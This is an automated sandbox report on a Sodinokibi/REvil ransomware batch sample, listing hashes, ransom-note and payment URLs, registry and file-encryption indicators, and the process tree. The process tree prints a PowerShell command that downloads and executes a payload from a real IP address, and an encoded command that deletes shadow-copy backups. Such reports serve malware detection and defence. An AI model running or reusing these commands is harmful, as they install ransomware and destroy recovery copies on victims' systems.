Analysis
-
max time kernel
42s -
max time network
57s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
16-06-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
c1babe66cde4ba7ca2635d448438e6a1.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
c1babe66cde4ba7ca2635d448438e6a1.bat
Resource
win10
General
-
Target
c1babe66cde4ba7ca2635d448438e6a1.bat
-
Size
222B
-
MD5
5d6a86f5f4937b08aee25aaa8d3a2055
-
SHA1
14594baf678ec43b8a8b8b28a0712cfd6a1b1c49
-
SHA256
d12d6a19975f4a2ae445413df349de5478f7b5195a6da4dd6e2c4e05e2630e34
-
SHA512
f8d8fe726aeb722acc6c2aa83b191843b20f413da938723e00e6f780c32502f0faf001375a03787877d9464cf093774bcfaffd99d4fbf5574d87b6bd1292cc0f
Malware Config
Extracted
http://185.103.242.78/pastes/c1babe66cde4ba7ca2635d448438e6a1
Extracted
C:\424vc-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/56052A2C9F03212B
http://decryptor.cc/56052A2C9F03212B
Signatures
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1496 powershell.exe 1496 powershell.exe 1496 powershell.exe 1032 powershell.exe 1032 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1496 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 35 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\FindUnlock.midi powershell.exe File opened for modification \??\c:\program files\PushRepair.clr powershell.exe File opened for modification \??\c:\program files\SplitConfirm.snd powershell.exe File opened for modification \??\c:\program files\AddComplete.WTV powershell.exe File opened for modification \??\c:\program files\EditResume.DVR powershell.exe File opened for modification \??\c:\program files\FindSelect.wmf powershell.exe File opened for modification \??\c:\program files\RenameDebug.css powershell.exe File created \??\c:\program files\424vc-readme.txt powershell.exe File created \??\c:\program files (x86)\424vc-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertToProtect.i64 powershell.exe File opened for modification \??\c:\program files\OptimizeRemove.xltx powershell.exe File opened for modification \??\c:\program files\PublishStop.pdf powershell.exe File opened for modification \??\c:\program files\WriteShow.DVR-MS powershell.exe File opened for modification \??\c:\program files\BackupTrace.emz powershell.exe File opened for modification \??\c:\program files\CompressSend.asx powershell.exe File opened for modification \??\c:\program files\MergeInitialize.svg powershell.exe File opened for modification \??\c:\program files\OpenGet.mp3 powershell.exe File opened for modification \??\c:\program files\PingHide.ppt powershell.exe File opened for modification \??\c:\program files\RevokeInvoke.AAC powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\424vc-readme.txt powershell.exe File opened for modification \??\c:\program files\DismountRestart.vbe powershell.exe File created \??\c:\program files\microsoft sql server compact edition\424vc-readme.txt powershell.exe File opened for modification \??\c:\program files\SaveClose.crw powershell.exe File opened for modification \??\c:\program files\ClearEnable.vb powershell.exe File opened for modification \??\c:\program files\CompressRepair.js powershell.exe File opened for modification \??\c:\program files\RenameExit.jpg powershell.exe File opened for modification \??\c:\program files\SendEdit.7z powershell.exe File opened for modification \??\c:\program files\SetRestore.xml powershell.exe File opened for modification \??\c:\program files\ResolveSearch.vdw powershell.exe File opened for modification \??\c:\program files\EnableWrite.kix powershell.exe File opened for modification \??\c:\program files\HideSwitch.3gp2 powershell.exe File opened for modification \??\c:\program files\MoveCompress.pptm powershell.exe File opened for modification \??\c:\program files\ResizeUnlock.m4a powershell.exe File opened for modification \??\c:\program files\SubmitReceive.vdw powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\424vc-readme.txt powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1412 wrote to memory of 1496 1412 cmd.exe powershell.exe PID 1496 wrote to memory of 1032 1496 powershell.exe powershell.exe PID 1496 wrote to memory of 1032 1496 powershell.exe powershell.exe PID 1496 wrote to memory of 1032 1496 powershell.exe powershell.exe PID 1496 wrote to memory of 1032 1496 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeBackupPrivilege 1760 vssvc.exe Token: SeRestorePrivilege 1760 vssvc.exe Token: SeAuditPrivilege 1760 vssvc.exe Token: SeTakeOwnershipPrivilege 1496 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0l0985f1wk3.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1496 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\c1babe66cde4ba7ca2635d448438e6a1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c1babe66cde4ba7ca2635d448438e6a1');Invoke-BZLEXSHRVANSJKV;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1760